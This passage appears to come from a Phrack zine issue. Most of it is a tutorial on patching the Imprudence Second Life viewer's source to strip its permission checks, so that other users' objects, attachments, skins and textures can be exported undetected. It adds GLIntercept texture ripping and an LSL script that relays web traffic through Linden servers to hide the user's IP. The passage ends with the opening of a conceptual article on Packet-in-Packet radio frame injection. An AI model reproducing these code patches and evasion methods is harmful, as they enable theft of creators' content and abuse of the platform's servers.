by a liability dumping prompt. Whenever an avatar wants to interact with
|
|
you, you are prompted to allow them permission to do so. However, the
|
|
graphics are always displayed and your viewer renders other avatars without
|
|
any checks. One annoyance, for example, is to spam particles generated by
|
|
LSL. Given a sufficiently slow computer, your viewer will end up
|
|
overwhelmed and crash eventually. These days, good luck with that...
|
|
|
|
But how do we export stuff we do not own, doesn't the server check for
|
|
permissions? Not really, we are not going to "take" the object in the sense
|
|
of violating the Second Life permissions. We are going to scan the object
|
|
and note down all the parameters that the viewer can see. We are then going
|
|
to store that in an XML file along with the textures as well. This will be
|
|
done automatically using Imprudence's "Export..." feature.
|
|
|
|
Whenever you upload any of the content types mentioned in the previous
|
|
chapter, the Linden asset server generates an asset ID which is basically
|
|
an UUID that references the content you uploaded. The asset server
|
|
(conveniently for us) does not carry out any checks to see whether there is
|
|
a link between an object referencing that UUID and the original uploader.
|
|
Spelled out, if you manage to grab the UUID of an asset, you can reference
|
|
it from an object you create.
|
|
|
|
For example, if a user has uploaded a texture and I manage to grab the UUID
|
|
of the texture generated by the asset server, then I can use LSL to display
|
|
it on the surface of a primitive. It is basically just security through
|
|
obscurity (and bugs)...
|
|
|
|
------[ I. Part I - Objects
|
|
|
|
The "Export..." feature on the viewers we attack is not an official feature
|
|
but rather a feature implemented by the developers of the viewers
|
|
themselves. That generally means that the viewer only implements certain
|
|
checks at the client level without them being enforced by the server. The
|
|
"Export..." feature is just a dumb feature which scans the object's
|
|
measurements, grabs the textures and dumps the data to an XML file and
|
|
stores image files separately.
|
|
|
|
Since it is a client-side check, we can go ahead and download Imprudence
|
|
(the same approach would work on the Phoenix [5] client too) and knock out
|
|
all these viewer checks.
|
|
|
|
After you cloned the Imprudence viewer from the git repo, the first file we
|
|
edit is at linden/indra/newview/primbackup.cpp.
|
|
|
|
Along the very fist lines there is a routine that sets the default
|
|
textures, I do not think this is needed to make our "Export..." work, but
|
|
it is a good introduction to what is going on in this article:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
void setDefaultTextures()
|
|
{
|
|
if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
{
|
|
// When not in SL (no texture perm check needed), we can
|
|
// get these defaults from the user settings...
|
|
LL_TEXTURE_PLYWOOD =
|
|
LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
|
|
LL_TEXTURE_BLANK =
|
|
LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
|
|
if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
|
|
{
|
|
// This control only exists in the
|
|
// AllowInvisibleTextureInPicker patch
|
|
LL_TEXTURE_INVISIBLE =
|
|
LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
|
|
}
|
|
}
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
The viewer uses a method isSecondLife() to check if it is currently on the
|
|
official grid. Depending on the outcome of this method, the viewer
|
|
internally takes decisions on whether certain things are allowed so that
|
|
the viewer will conform to the Linden third-party viewer (TPV) policy [6].
|
|
The TPV policy is a set of rules that the creator of a viewer has to
|
|
respect so that the viewer will be granted access to the Second Life grid
|
|
(ye shall not steal, ye shall not spam, etc...).
|
|
|
|
However, these checks are client-side only. They are used internally within
|
|
the viewer and they have nothing to do with the Linden servers. What we do,
|
|
is knock them out so that the viewer does not perform the check to see if
|
|
it is on the official grid. In this particular case, we can knock out the
|
|
check easily by eliminating the if-clause, like so:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
void setDefaultTextures()
|
|
{
|
|
//if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
//{
|
|
// When not in SL (no texture perm check needed), we can
|
|
// get these defaults from the user settings...
|
|
LL_TEXTURE_PLYWOOD =
|
|
LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
|
|
LL_TEXTURE_BLANK =
|
|
LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
|
|
if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
|
|
{
|
|
// This control only exists in the
|
|
// AllowInvisibleTextureInPicker patch
|
|
LL_TEXTURE_INVISIBLE =
|
|
LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
|
|
}
|
|
//}
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Without this check, the viewer assumes that we are on any grid but the
|
|
Second Life grid. You probably can notice that these checks are completely
|
|
boilerplate.
|
|
|
|
Let us move on to the next stop. Somewhere in
|
|
linden/indra/newview/primbackup.cpp you will find the following:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
|
|
{
|
|
if(gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
{
|
|
// In Second Life, you must be the creator to be permitted to
|
|
// export the asset.
|
|
return (gAgent.getID() == item_permissions->getOwner() &&
|
|
gAgent.getID() == item_permissions->getCreator() &&
|
|
(PERM_ITEM_UNRESTRICTED & item_permissions->getMaskOwner())
|
|
== PERM_ITEM_UNRESTRICTED);
|
|
}
|
|
else
|
|
{
|
|
// Out of Second Life, simply check that you're the owner and the
|
|
// asset is full perms.
|
|
return (gAgent.getID() == item_permissions->getOwner() &&
|
|
(item_permissions->getMaskOwner() & PERM_ITEM_UNRESTRICTED)
|
|
== PERM_ITEM_UNRESTRICTED);
|
|
}
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
This checks to see if you have full permissions, and are the owner and the
|
|
creator of the object you want to export. This only applies to the Second
|
|
Life grid. If you are not on the Second Life grid, then it checks to see if
|
|
you are the owner and have full permissions. We will not bother and will
|
|
modify it to always return that all our permissions are in order:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
|
|
{
|
|
return true;
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
The next stop is in the same file, at the following method:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
|
|
{
|
|
if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
{
|
|
// If we are not in Second Life, don't bother
|
|
return asset_id;
|
|
}
|
|
|
|
LLUUID texture = LL_TEXTURE_PLYWOOD;
|
|
if (asset_id == texture ||
|
|
asset_id == LL_TEXTURE_BLANK ||
|
|
asset_id == LL_TEXTURE_INVISIBLE ||
|
|
asset_id == LL_TEXTURE_TRANSPARENT ||
|
|
asset_id == LL_TEXTURE_MEDIA)
|
|
{
|
|
// Allow to export a grid's default textures
|
|
return asset_id;
|
|
}
|
|
LLViewerInventoryCategory::cat_array_t cats;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
There is a complete explanation of what this does in the comments. This
|
|
checks to see whether you are in Second Life, and if you are, it goes
|
|
through a series of inefficient and poorly coded checks to ensure that you
|
|
are indeed the creator of the texture by testing whether the texture is in
|
|
your inventory. We eliminate those checks and make it return the asset ID
|
|
directly:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
|
|
{
|
|
return asset_id;
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Once you compile the modified viewer, you will be able to export any
|
|
object, along with its textures that you can see in-world. The next step is
|
|
to modify the skin (i.e. Imprudence's user interface) so that you may
|
|
export attachments from the GUI.
|
|
|
|
First, let us enable the pie "Export..." button. I will assume that you use
|
|
the default skin. The next stop is at
|
|
linden/indra/newview/skins/default/xui/en-us/menu_pie_attachment.xml. You
|
|
will need to add:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
<menu_item_call enabled="true" label="Export" mouse_opaque="true"
|
|
name="Object Export">
|
|
<on_click function="Object.Export" />
|
|
<on_enable function="Object.EnableExport" />
|
|
</menu_item_call>
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Now, we need to enable it for any avatar at
|
|
linden/indra/newview/skins/default/xui/en-us/menu_pie_avatar.xml. You will
|
|
need to add:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
<menu_item_call enabled="true" label="Export" mouse_opaque="true"
|
|
name="Object Export">
|
|
<on_click function="Object.Export" />
|
|
<on_enable function="Object.EnableExport" />
|
|
</menu_item_call>
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
After that, we must add them so the viewer picks up the skin options. We
|
|
open up linden/indra/newview/llviewermenu.cpp and add in the avatar pie
|
|
menu section:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
// Avatar pie menu
|
|
...
|
|
addMenu(new LLObjectExport(), "Avatar.Export");
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
We do the same for the attachments section:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
// Attachment pie menu
|
|
...
|
|
|
|
addMenu(new LLObjectEnableExport(), "Attachment.EnableExport");
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Now we are set. However, the viewer performs a check in "EnableExport" in
|
|
linden/indra/newview/llviewermenu.cpp which we need to knock out:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectEnableExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
LLControlVariable* control =
|
|
gMenuHolder->findControl(userdata["control"].asString());
|
|
|
|
LLViewerObject* object =
|
|
LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
|
|
|
|
if((object != NULL) &&
|
|
(find_avatar_from_object(object) == NULL))
|
|
{
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
The code initially checks whether the object exists, if it is not worn by
|
|
an avatar, and then applies permission validations to all the children
|
|
(links) of the object. If the object exists, if it is not worn by an avatar
|
|
and all the permissions for all child objects are correct, then the viewer
|
|
enables the "Export..." control. Since we do not care either way, we enable
|
|
the control regardless of any checks.
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectEnableExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
LLControlVariable* control =
|
|
gMenuHolder->findControl(userdata["control"].asString());
|
|
|
|
LLViewerObject* object =
|
|
LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
|
|
|
|
if(object != NULL)
|
|
{
|
|
control->setValue(true);
|
|
return true;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
I have left the NULL check for the object since if you happen to mis-click
|
|
and select something other than an object, then the "Export..." pie menu
|
|
will be enabled and your viewer will crash. More precisely, if you instruct
|
|
the viewer to export something using the object export feature, and it is
|
|
not an object, the viewer will crash since there are no checks performed
|
|
after this step.
|
|
|
|
Further on in linden/indra/newview/llviewermenu.cpp there is another test
|
|
to see whether the object you want to export is attached to an avatar. In
|
|
that case, the viewer considers it an attachment and disallows exporting.
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
LLViewerObject* object =
|
|
LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
|
|
if (!object) return true;
|
|
|
|
LLVOAvatar* avatar = find_avatar_from_object(object);
|
|
|
|
if (!avatar)
|
|
{
|
|
PrimBackup::getInstance()->exportObject();
|
|
}
|
|
|
|
return true;
|
|
}
|
|
};
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Again, we proceed the same way and knock out that check which will allow
|
|
us to export objects worn by any avatar:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
PrimBackup::getInstance()->exportObject();
|
|
|
|
return true;
|
|
}
|
|
};
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
These changes will be sufficient in order to transform your viewer into an
|
|
undetectable tool that will allow you to export any object along with the
|
|
associated textures.
|
|
|
|
There are indeed easier ways, for example toggling God mode from the
|
|
source code and bypassing most checks. However, that will be discussed
|
|
in the upcoming full article, along with explanations on what Linden are
|
|
able to detect and wearable exports.
|
|
|
|
Alternatively, and getting closer to a "bot", there are ways to program
|
|
a fully non-interactive client [11] that will export everything it sees
|
|
automatically. This will also be covered in the upcoming article since it
|
|
takes a little more than hacks. The principle still holds: "who controls
|
|
an asset UUID, has at least permission to grab the asset off the asset
|
|
server".
|
|
|
|
------[ II. Part II - Textures
|
|
|
|
In the first part we have talked about exporting objects. There is more fun
|
|
you can have with the viewer too, for example, grabbing any texture UUID,
|
|
or dumping your skin and clothes textures.
|
|
|
|
What can we do about clothes? If you have an outfit you would like to grab,
|
|
with the previous method you will only be able to export primitives without
|
|
the wearable clothes. How about backing up your skin?
|
|
|
|
The 1.x branch of the Linden viewer has an option, disabled by default and
|
|
only accessible to grid Gods, which will allow you to grab baked textures.
|
|
Grid Gods are essentially Game Masters and in the case of Second Life, they
|
|
consist of the "Linden"s, which are Linden Labs employees represented
|
|
in-world by avatars, conventionally having "Linden" as their avatar's last
|
|
name.
|
|
|
|
We open up linden/indra/newview/llvoavatar.cpp and we find:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
|
|
{
|
|
// Check if the texture hasn't been baked yet.
|
|
if (!isTextureDefined(index))
|
|
{
|
|
lldebugs << "getTEImage( " << (U32) index << " )->getID()
|
|
== IMG_DEFAULT_AVATAR" << llendl;
|
|
return FALSE;
|
|
}
|
|
|
|
if (gAgent.isGodlike() && !gAgent.getAdminOverride())
|
|
return TRUE;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Aha, so it seems that grid Gods are permitted to grab textures. That is
|
|
fine, so can we:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
|
|
{
|
|
// Check if the texture hasn't been baked yet.
|
|
if (!isTextureDefined(index))
|
|
{
|
|
lldebugs << "getTEImage( " << (U32) index << " )->getID()
|
|
== IMG_DEFAULT_AVATAR" << llendl;
|
|
return FALSE;
|
|
}
|
|
|
|
return TRUE;
|
|
|
|
if (gAgent.isGodlike() && !gAgent.getAdminOverride())
|
|
return TRUE;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
But that is not sufficient. The 1.x viewer code has an error (perhaps
|
|
intentional) which will crash the viewer when you try to grab the lower
|
|
part of your avatar. In the original code at
|
|
linden/indra/newview/llviewermenu.cpp, we have:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
else if ("lower" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_SKIRT_BAKED );
|
|
}
|
|
else if ("skirt" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_SKIRT_BAKED );
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Which must be changed to:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
else if ("lower" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_LOWER_BAKED );
|
|
}
|
|
else if ("skirt" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_SKIRT_BAKED );
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
You are free to recompile and go to the menu and dump the textures on you,
|
|
including your skin. To grab your skin, you can undress your avatar and
|
|
grab the textures. You can then export them using the method from Part I.
|
|
For clothes, you would do the same by clothing your avatar, grabbing the
|
|
relevant textures and then exporting them using the method from Part I.
|
|
|
|
You might notice that the texture that will be dumped to your inventory is
|
|
temporary. That is, it is not an asset and registered with the asset
|
|
server. Make sure you save the texture, or, if you want to save a bunch of
|
|
them, consider reading the first part of the article and place the textures
|
|
on a primitive and export the entire primitive.
|
|
|
|
Since the textures are baked, they represent an overlay of your skin and
|
|
your clothes. If you want to extract just the clothes, you might need to
|
|
edit the grabbed textures in a graphics editing program to cut out the skin
|
|
parts. However, it might be possible to use a transparent texture for your
|
|
skin when you grab the textures. In that case, you will not have to edit
|
|
the clothes at all.
|
|
|
|
------[ II. Part II - Textures
|
|
II. i. Textures - GLIntercept
|
|
|
|
The GLIntercept method involves grabbing a copy of GLIntercept and
|
|
replacing the .dll file with the GLIntercept one. By doing that, when you
|
|
run the Second Life viewer, all the textures will be stored to your hard
|
|
drive in the images directory. It is a resource consuming procedure because
|
|
any texture that your viewer sees is saved to your hard-drive.
|
|
|
|
Therefore, if your only interest is to allot a collection of textures, then
|
|
get GLIntercept and, after installing it, replace the opengl .dll from your
|
|
viewer directory with the one from GLIntercept. If you cannot find the
|
|
viewer's opengl .dll, then just copy it as a new file because the viewer
|
|
will pick it up. I recommend setting your graphics all the way to low and
|
|
taking it easy because in the background, the GLIntercept .dll will create
|
|
an images directory and dump all the possible textures, including the
|
|
textures belonging to the UI.
|
|
|
|
There is a lot of fuss going on about GLIntercept. Some strange people say
|
|
it does not work anymore and some funny people come up with ideas like
|
|
encrypting the textures. The principle that GLIntercept works on is trivial
|
|
to the point of making the whole fuss meaningless. GLIntercept, when used
|
|
in conjunction with the viewer is an extra layer between your viewer and
|
|
opengl. Anything that your graphics card renders can be grabbed - together
|
|
with other similar software [8], the same effect described in this article,
|
|
however it would require you to convert the structures to the Second Life
|
|
format. The usage of GLIntercept is not restricted to Second Life, you can
|
|
go ahead and grab anything you like from any program that uses opengl. It
|
|
literally puts a dent (crater?) into content stealing, the important phrase
|
|
being: "anything that your graphics card renders, can be grabbed".
|
|
|
|
------[ IV. Postamble
|
|
|
|
Second Life is a vanity driven virtual universe which is plagued by the
|
|
most horrible muppets that fake anonymity could spawn. The Lindens maintain
|
|
full control and all the content you upload automatically switches
|
|
ownership to Linden Labs via the Terms of Service which make you renounce
|
|
your copyright. Not only that, but there are plenty of rumours you are
|
|
tracked and they have a dodgy "age-verification" system in place which
|
|
forces you to send your ID card to be checked by "a third party". Under
|
|
these circumstances, it is of course questionable what they do with that
|
|
data and whether they link your in-world activities to your identity.
|
|
|
|
There is more that could be potentially done, the viewers are so frail and
|
|
incredibly poorly coded from all perspectives and certainly not the quality
|
|
you would expect from an institution that makes billions of shineys. There
|
|
have been exploits before such as Charlie Miller's Quicktime exploit [9]
|
|
which was able to gain full control of your machine (patched now) and
|
|
Michael Thumann's excellent presentation which goes over many concepts of
|
|
Second Life as well as how they can be abused [10].
|
|
|
|
One of the further possibilities I have been looking into (closely related
|
|
to Michael Thumann's presentation) is to use LSL and create an in-world
|
|
proxy that will enable your browser to connect to a primitive in-world and
|
|
bounce your traffic. There is a limitation imposed on the amount of
|
|
information an LSL script can retrieve off the web, however I am still
|
|
looking into way to circumvent that. Essentially the idea would be to use
|
|
the Linden Labs servers as a proxy to carry out all the surfing. At the
|
|
current time of writing this article, I do have a working LSL
|
|
implementation (you can see an example of that in [A. 1]) that can grab 2kb
|
|
off any website (this is a limitation imposed by the LSL function
|
|
llHTTPRequest()). Additionally, a PHP page could be created that rewrites
|
|
the content sent back by the LSL script and so that the links send the
|
|
requests back through the script in Second Life.
|
|
|
|
Not only IPs, but headers, timezone, DNS requests and everything else gets
|
|
spoofed that way.
|
|
|
|
The possibilities are limitless and I have seen viewers emerge that rely on
|
|
this concept, such as CryoLife or NeilLife. However, the identification
|
|
strings sent by the few versions lying around the net have been tagged and
|
|
any user connecting with them would be banned. If you want to amuse
|
|
yourself further, you may want to have a look at:
|
|
|
|
http://wiki.secondlife.com/wiki/User:Crone_Dryke
|
|
|
|
Dedicated to CV. Many thanks to the Phrack Staff for their help and their
|
|
interest in the article.
|
|
|
|
Thank you for your time!
|
|
|
|
------[ B. Bibliography
|
|
|
|
[1] The Second Life website,
|
|
http://secondlife.com/
|
|
[2] Linden Labs official website,
|
|
http://lindenlab.com/
|
|
[3] Linden Scripting Language LSL Wiki,
|
|
http://wiki.secondlife.com/wiki/LSL_Portal
|
|
[4] Imprudence Viewer downloads,
|
|
http://wiki.kokuaviewer.org/wiki/Imprudence:Downloads
|
|
[5] The Phoenix Viewer,
|
|
http://www.phoenixviewer.com/
|
|
[6] The third-party viewer policy,
|
|
http://secondlife.com/corporate/tpv.php
|
|
[7] GLIntercept,
|
|
http://oreilly.com/pub/h/5235
|
|
[8] Ogre exporters,
|
|
http://www.ogre3d.org/tikiwiki/OGRE+Exporters
|
|
[9] QuickTime exploit granting full access to a users machine,
|
|
http://securityevaluators.com/content/case-studies/sl/
|
|
[10] Thumann's presentation on possibilities how to exploit Second Life,
|
|
https://www.blackhat.com/presentations/bh-europe-08/Thumann/
|
|
Presentation/bh-eu-08-thumann.pdf
|
|
[11] OpenMetaverse Library for Developers,
|
|
http://lib.openmetaverse.org/wiki/Main_Page
|
|
|
|
------[ A. Appendix
|
|
|
|
[A. 1] LSL script which requests an publicly accessible URL from the
|
|
current SIM it is located on, and answers any proxies HTTP requests by
|
|
accessing the public URL, suffixed with "/url=<some URL>" where "some URL"
|
|
represents a web address. The script fetches 2k of the content and then
|
|
sends it back to the browser.
|
|
|
|
key uReq;
|
|
key sReq;
|
|
|
|
default
|
|
{
|
|
state_entry()
|
|
{
|
|
llRequestURL();
|
|
}
|
|
|
|
changed(integer change)
|
|
{
|
|
if (change & CHANGED_INVENTORY) llResetScript();
|
|
}
|
|
|
|
http_request(key id, string method, string body)
|
|
{
|
|
if (method == URL_REQUEST_GRANTED) {
|
|
llOwnerSay(body);
|
|
return;
|
|
}
|
|
if (method == "GET") {
|
|
uReq = id;
|
|
list pURL = llParseString2List(
|
|
llGetHTTPHeader(id, "x-query-string"), ["="], []);
|
|
if (llList2String(pURL, 0) == "url")
|
|
sReq = llHTTPRequest(llList2String(pURL, 1),
|
|
[HTTP_METHOD, "GET"], "");
|
|
}
|
|
}
|
|
http_response(key request_id,
|
|
integer status,
|
|
list metadata,
|
|
string body)
|
|
{
|
|
if (sReq == request_id) llHTTPResponse(uReq, 200, body);
|
|
}
|
|
}
|
|
|
|
|
|
|=[ 0x06 ]=---=[ How I misunderstood digital radio; or,
|
|
"Weird machines" are in radio, too! - M.Laphroaig
|
|
pastor@phrack ]--=|
|
|
|
|
...there be bytes in the air
|
|
and Turing machines everywhere
|
|
|
|
When one lays claim to generalizing a class of common misconceptions,
|
|
it is fitting to start with one's own. These are the things I used to
|
|
believe about digital radio -- or, more precisely, would not have
|
|
questioned if explicitly presented with them.
|
|
|
|
=== Wishful thinking ===
|
|
|
|
The following statements are obviously related and mutually
|
|
reinforcing:
|
|
|
|
1. Layer 1 delivers frames to Layer 2 either fully intact frames
|
|
exactly as transmitted by a peer in their entirety, or slightly
|
|
corrupted versions of such frames if CRC checking in Layer 1 is
|
|
disabled, as it sometimes is for sniffing.
|
|
|
|
2. In order to be received at Layer 1, a frame must be transmitted
|
|
with proper encapsulation by a compatible Layer 1 transmitter using
|
|
the exact same PHY protocol. There is no substitution in commodity
|
|
PHY implementations for the radio chip circuitry activated when the
|
|
chip starts transmitting a queued Layer 2 frame, except by use of
|
|
an expensive software defined radio.
|
|
|
|
3. Layer 1 implementations have means to unambiguously distinguish
|
|
between the radio transmission that precedes a frame -- such as the
|
|
frame's preamble -- and the frame's actual data. One cannot be
|
|
mistaken for another, or such a mistake would be extremely rare and
|
|
barely reproducible.
|
|
|
|
4. Should a receiver miss the physical beginning of a frame
|
|
transmission on the air due to noise or a timing problem, the rest
|
|
of the transmission is wasted, and no valid frame could be received
|
|
at least until this frame's transmission is over.
|
|
|
|
For Layer 1 injection, this would imply the following limitations:
|
|
|
|
a. In order to successfully "inject" a crafted Layer 1 frame (that is,
|
|
to have it received by the target) the attacker needs to (1) build
|
|
the binary representation of the full frame in a buffer, (2)
|
|
possess a radio capable of transmitting buffer binary contents, and
|
|
(3) instruct the radio to transmit the buffer, possibly bypassing
|
|
hardware or firmware implementations of protocol features that may
|
|
alter or side-effect the transmission.
|
|
|
|
b. In particular, the injecting radio must perfectly cooperate by
|
|
producing the proper encapsulating physical signals for the
|
|
preamble, etc., around the injected buffer-held frame. Without such
|
|
cooperation, injection is not possible.
|
|
|
|
c. Errors due to radio noise can only break injection. The injecting
|
|
transmission, as a rule, needs to be more powerful to avoid being
|
|
thwarted by ambient noise.
|
|
|
|
d. Faraday cages are the ultimate protection against injection, as
|
|
long as the nodes therein maintain their software and hardware
|
|
integrity, and do not afford any undue privileges to the attacker.
|
|
|
|
A high-level summary of these beliefs could be stated like
|
|
this: the OSI Layer 1/Layer 2 boundary in digital radio is a _validity
|
|
and authenticity filter_ for frames. In order to be received, a frame
|
|
must be transmitted in its entirety via an "authentic" mechanism, the
|
|
transmitting chip's logic going through its normal or nearly normal
|
|
state transitions, or emulated by a software-defined radio.
|
|
|
|
Each and every one of these is _false_, as demonstrated by the
|
|
existence of Packet-in-Packet (PIP) [1,2] exploits.
|
|
|
|
=== A Packet Breaks Out ===
|
|
|
|
On a cold and windy February 23rd of 2011, my illusions came to an
|
|
abrupt end when I saw the payload bytes of an 802.15.4 frame's data
|
|
--- transmitted inside a valid packet as a regular payload ---
|
|
received as a frame of its own, reproducibly.
|
|
|
|
The "inner" packet, which I believed to be safely contained within the
|
|
belly of the enclosing frame would occasionally break out and arrive
|
|
all by itself, without any sign of the encapsulating packet.
|
|
|
|
Every once in a while, there was no whale, just Jonah. It was a very
|
|
unwelcome miracle for someone who believed he could be safe from even
|
|
SDR-wielding attackers inside a cozy Faraday cage, as long as his
|
|
utopian gated community had no compromised nodes.
|
|
|
|
Where was my encapsulation now? Where was my textbook's OSI model?
|
|
|
|
Lies, all lies. Sweet illusions shattered by cruel Packet-in-Packet,
|
|
the textbook illusion of neat encapsulation chief among them. How the
|
|
books lied.
|
|
|
|
=== Packet-in-Packet: a miracle explained ===
|
|
|
|
The following is a typical structure of a digital radio frame
|
|
as seen by the radio:
|
|
|
|
------+----------+-----+-------------------------------+-----+------
|
|
noise | preamble | SFD | L2 frame reported by sniffers | CRC | noise
|
|
------+----------+-----+-------------------------------+-----+------
|
|
|
|
The receiving radio uses the preamble bytes to synchronize itself, at
|
|
the same time looking for SFD bytes digitally. Once a sequence of SFD
|
|
bytes matches, the radio starts treating further incoming bytes as the
|
|
content of the frame, saving them and feeding them into its checksum
|
|
computation.
|
|
|
|
Consider the situation when the "L2 payload bytes" transmitted after
|
|
the SFD themselves contain the following, say, as a valid payload of
|
|
a higher layer protocol:
|
|
|
|
---------+-----+--------------------+--------------------------------
|
|
preamble | SFD | inner packet bytes | valid checksum for inner packet
|
|
---------+-----+--------------------+--------------------------------
|
|
|
|
If the original frame's preamble and SFD are intact, all of the above
|
|
will be received and passed on to the driver and the OS as regular
|
|
payload bytes as intended.
|
|
|
|
Imagine, however, that the original SFD is damaged by noise and missed
|
|
by the radio. Then the initial bytes of the outer frame will be
|
|
interpreted as noise, leading up to the embedded "preamble" and "SFD"
|
|
of the would-be payload. Instead, these preamble and SFD will be taken
|
|
to indicate an actual start of a real frame, and the "inner" packet
|
|
will be heard, up to an including the valid checksum. The following
|
|
bytes of the enclosing frame will again be dismissed as noise, until
|
|
another sequence of "preamble + SFD" is encountered.
|
|
|
|
Thus, due to noise damaging the real SFD and the receiver's inability
|
|
to tell noise bytes from payload bytes except by matching for an SFD,
|
|
the radio will occasionally receive the inner packet -- precisely as
|
|
if it were sent alone, deliberately.
|
|
|
|
Thus a remote attacker capable of controlling the higher level
|
|
protocol payloads that get transmitted over the air by one of the
|
|
targeted radios on the targeted wireless network is essentially
|
|
capable of occasionally injecting crafted Layer 1 frames -- without
|
|
ever owning any radio or being near the targeted radios' physical
|
|
location.
|
|
|
|
Yes, Mallory, there is such a thing as Layer 1 wireless injection
|
|
without a radio. No, Mallory, a mean, nasty Faraday cage will not
|
|
spoil your holiday.
|
|
|
|
=== The reality ===
|
|
|
|
Designers of Layer 2 and above trust Layer 1 to provide valid or
|
|
"authentic" objects (frames) across the layer boundary. This trust is
|
|
misplaced.
|
|
|
|
There are two factors that likely contribute to it among network
|
|
engineers and researchers who are not familiar with radio Layer 1
|
|
implementations but have read driver and code in the layers above.
|
|
|
|
